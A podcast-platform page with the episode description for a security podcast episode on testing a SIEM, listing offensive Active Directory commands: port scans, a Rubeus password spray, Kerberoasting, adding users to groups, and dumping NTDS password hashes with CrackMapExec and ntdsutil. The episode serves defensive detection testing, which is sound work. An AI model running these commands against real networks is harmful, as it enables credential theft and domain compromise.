Podme logo
KotiLöydäKategoriatEtsiOpiskelijoille
7MS #554: Simple Ways to Test Your SIEM

7MS #554: Simple Ways to Test Your SIEM

59:542023-01-06

Jaksokuvaus

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered: Port scanning nmap 10.0.7.0/24 - basic nmap scan massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports! Password spraying Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt Kerberoasting and ASREPRoasting rubeus.exe kerberoast /simple rubeus asreproast /nowrap Key group membership changes net group "GROUP NAME" user-to-add-to-a-group /add Dump Active Directory hashes cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q SMB share hunting Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares

logo

PODME

TIEDOT

  • Evästekäytäntö
  • Käyttöehdot
  • Tietosuojakäytäntö
  • Medialle

LATAA SOVELLUKSEMME!

app storegoogle play store

ALUEELLA

flag
  • sweden_flag
  • norway_flag
  • finland_flag

© Podme AB 2024